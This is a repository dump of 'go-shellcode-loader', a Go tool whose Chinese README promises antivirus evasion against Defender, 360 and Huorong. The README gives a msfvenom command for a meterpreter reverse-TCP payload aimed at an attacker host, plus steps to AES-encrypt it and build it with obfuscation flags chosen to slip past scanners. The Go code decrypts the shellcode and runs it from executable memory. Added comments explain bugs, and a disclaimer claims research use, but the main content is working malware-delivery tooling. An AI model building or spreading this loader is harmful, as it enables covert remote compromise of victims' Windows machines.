├── README.md ├── aes_sc.go └── go-sc.go /README.md: -------------------------------------------------------------------------------- 1 | # go-shellcode-loader 2 | 3 | GO混淆免杀shellcode加载器AES加密 4 | 5 | 混淆反检测 过DF、360和火绒 6 | 7 | 8 | #### 获取项目 9 | 10 | ```Bash 11 | git clone https://github.com/HZzz2/go-shellcode-loader.git 12 | cd go-shellcode-loader 13 | //下条命令安装第三方混淆库 GitHub地址:https://github.com/burrowers/garble 14 | go install mvdan.cc/garble@latest 15 | 16 | ``` 17 | 18 | #### 生成shellcode并base64 19 | 20 | `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw` 21 | 22 | `base64 -w 0 -i rev.raw > rev.bs64` 23 | 24 | `cat rev.bs64` 25 | 26 | **复制到aes-sc.go中的51行替换payload** 27 | 28 | 运行aes-sc.go生成AES加密后的值 29 | 30 | `go run aes_sc.go` 31 | 32 | 复制输出的值到go-sc.go中的73行替换payload 33 | 34 | #### **编译成exe可执行程序** 35 | 36 | `garble -tiny -literals -seed=random build -ldflags="-w -s -H windowsgui" -race go-sc.go` 37 | 38 | 参数解释: 39 | 40 | garble(混淆库): 41 | 42 | -tiny 删除额外信息 43 | 44 | -literals 混淆文字 45 | 46 | -seed=random base64编码的随机种子 47 | 48 | go: 49 | 50 | -w 去掉调试信息,不能gdb调试了 51 | 52 | -s 去掉符号表 53 | 54 | -H windowsgui 隐藏执行窗口,不占用 cmd 终端。 (被查杀率高) 55 | 56 | -race 使数据允许竞争检测,编译时改变了生成后的文件特征, 使得杀软无法检测,当然有一天也会失效的。 57 | 58 | 编译后得到go-sc.exe 59 | 60 | #### 检测图 61 | 62 | **火绒** 63 | 64 | ![image](https://user-images.githubusercontent.com/22775890/172315590-c32aa9ad-0b2b-43cd-a96c-45d971a83ef5.png) 65 | 66 | 67 | **360杀毒** 68 | 69 | ![image](https://user-images.githubusercontent.com/22775890/172315610-9bfa9d41-31a1-42d5-bd54-b0ce3e73318d.png) 70 | 71 | 72 | **360卫士** 73 | 74 | ![image](https://user-images.githubusercontent.com/22775890/172315642-73266f42-6019-42b7-bb02-5dd59b0925b7.png) 75 | 76 | 77 | 78 | **DF** 79 | 80 | ![image](https://user-images.githubusercontent.com/22775890/172315670-89a23a36-5e1f-40e8-b311-a4a22490d1ca.png) 81 | 82 | 83 | 84 | **virustotal** 85 | 86 | 
![image](https://user-images.githubusercontent.com/22775890/172315706-4fbd57a6-0e14-497a-af91-ea6c7cdf0704.png) 87 | 88 | 89 | 90 | **微步云杀箱** 91 | 92 | ![image](https://user-images.githubusercontent.com/22775890/172315732-84eb7a75-481c-4904-a341-bd96a336ad87.png) 93 | 94 | 95 | 96 | 97 | **运行效果** 98 | 99 | 100 | 101 | 102 | https://user-images.githubusercontent.com/22775890/172315782-707cfbbb-90ed-4156-97d8-dcaf0da8a554.mp4 103 | 104 | 105 | ## 免责声明 106 | 仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。 107 | -------------------------------------------------------------------------------- /aes_sc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bytes" 5 | "crypto/aes" 6 | "crypto/cipher" 7 | "encoding/base64" 8 | "fmt" 9 | ) 10 | /* CheckError panics when err is non-nil. It is not called anywhere in this file as shown. */ 11 | func CheckError(err error) { 12 | if err != nil { 13 | panic(err) 14 | } 15 | } 16 | 17 | //PaddingText1 appends PKCS#7-style padding so the result length is a multiple of blockSize: always at least one byte, every pad byte equal to the pad length. blockSize == 0 divides by zero (panic) and blockSize > 255 cannot be represented in the marker byte. append may write into str's spare capacity, so the caller's slice can be aliased by the result. 18 | func PaddingText1(str []byte, blockSize int) []byte { 19 | //number of bytes to add, in 1..blockSize 20 | paddingCount := blockSize - len(str)%blockSize 21 | //paddingCount bytes, each holding the value paddingCount 22 | paddingStr := bytes.Repeat([]byte{byte(paddingCount)}, paddingCount) 23 | newPaddingStr := append(str, paddingStr...) 
24 | //fmt.Println(newPaddingStr) 25 | return newPaddingStr 26 | } 27 | 28 | //---------------AES-CBC encrypt (the original comment said DES; crypto/aes is what the code uses)-------------------- 29 | /* EncyptogAES pads src with PaddingText1 and encrypts it in place with AES-CBC, returning the ciphertext. The key is reused as the IV: cipher.NewCBCEncrypter panics unless len(iv) equals the 16-byte block size, so only a 16-byte (AES-128) key works here, and because the IV is fixed the same plaintext always yields the same ciphertext. If aes.NewCipher rejects the key length, "<nil>" is printed (the actual error is dropped) and nil is returned. Since PaddingText1 appends to src, the result may share src's backing array. */ func EncyptogAES(src, key []byte) []byte { 30 | block, err := aes.NewCipher(key) 31 | if err != nil { 32 | fmt.Println(nil) 33 | return nil 34 | } 35 | src = PaddingText1(src, block.BlockSize()) 36 | /* key doubles as the IV, see the note above */ blockMode := cipher.NewCBCEncrypter(block, key) 37 | blockMode.CryptBlocks(src, src) 38 | return src 39 | 40 | } 41 | 42 | /* Encryptor entry point: encrypts the placeholder str (the base64 text the README says to paste here) under the fixed 16-byte key and prints the base64 ciphertext. The same literal key is compiled into go-sc.go, so anyone holding either program can recover the plaintext. */ func main() { 43 | //replace with the payload (base64 text) 44 | str := "payload" 45 | //key length 16 46 | key := []byte("LeslieCheungKwok") 47 | src := EncyptogAES([]byte(str), key) 48 | base64Str := base64.StdEncoding.EncodeToString(src) 49 | fmt.Println("加密后的数据为:", base64Str) 50 | 51 | } 52 | -------------------------------------------------------------------------------- /go-sc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "fmt" 8 | "syscall" 9 | "unsafe" 10 | ) 11 | 12 | /* kernel32 exports resolved lazily on the first Call; an export that cannot be resolved panics at that point. Windows-only (syscall.NewLazyDLL). */ var ( 13 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 14 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 15 | RtlMoveMemory = kernel32.NewProc("RtlMoveMemory") 16 | ) 17 | 18 | /* build base64-decodes ddm and executes the result in-process: VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE = 0x1000|0x2000, PAGE_EXECUTE_READWRITE = 0x40), RtlMoveMemory of the bytes into that region, then a transfer of control to addr through syscall.Syscall. Every error return is discarded: a decode failure leaves sDec empty and &sDec[0] panics with an index error, and a zero (failed) VirtualAlloc result is used unchecked. For analysts: the RWX allocation and the jump into it happen at runtime regardless of the encoding applied to the input. */ func build(ddm string) { 19 | sDec, _ := base64.StdEncoding.DecodeString(ddm) 20 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sDec)), 0x1000|0x2000, 0x40) 21 | _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sDec[0])), uintptr(len(sDec))) 22 | syscall.Syscall(addr, 0, 0, 0, 0) 23 | 24 | } 25 | 26 | 27 | 28 | //UnPaddingText1 removes PKCS#7-style padding: the last byte gives the pad length and that many bytes are dropped. Nothing is validated, so an empty input panics on str[n-1] and a last byte larger than len(str) panics on the slice bound; a wrongly keyed or corrupted ciphertext therefore crashes instead of returning an error. 29 | func UnPaddingText1(str []byte) []byte { 30 | n := len(str) 31 | count := int(str[n-1]) 32 | newPaddingText := str[:n-count] 33 | return newPaddingText 34 | } 35 | 36 | //---------------AES-CBC decrypt (the original comment said DES; crypto/aes is what the code uses)-------------------- 37 | 38 | 39 | /* DecrptogAES decrypts src in place with AES-CBC, reusing the key as the IV (cipher.NewCBCDecrypter panics unless len(iv) is the 16-byte block size, so only a 16-byte key works), then strips PKCS#7 padding with UnPaddingText1. src must be a non-empty multiple of 16 bytes or CryptBlocks panics. If aes.NewCipher rejects the key length, "<nil>" is printed (the actual error is dropped) and nil is returned. */ func DecrptogAES(src, key []byte) []byte { 40 | block, err := aes.NewCipher(key) 41 | if err != nil { 42 | fmt.Println(nil) 43 | return nil 44 | } 45 | /* key doubles as the IV, see the note above */ blockMode := cipher.NewCBCDecrypter(block, key) 46 | 
/* decrypt in place; len(src) must be a multiple of the AES block size or this panics */ blockMode.CryptBlocks(src, src) 47 | /* padding is not validated, so a wrong key or corrupted input panics here rather than returning an error */ src = UnPaddingText1(src) 48 | return src 49 | } 50 | /* Loader entry point: str is the placeholder for the base64 ciphertext printed by aes_sc.go, and key must match the literal used there. The base64 decode error is discarded, so a bad paste surfaces only as a panic inside DecrptogAES or UnPaddingText1. Per the README flow the decrypted bytes are themselves base64 text, which build decodes a second time. */ 51 | func main() { 52 | str := "payload" 53 | key := []byte("LeslieCheungKwok") 54 | base_byte, _ := base64.StdEncoding.DecodeString(str) 55 | build(string(DecrptogAES(base_byte, key))) 56 | } 57 | --------------------------------------------------------------------------------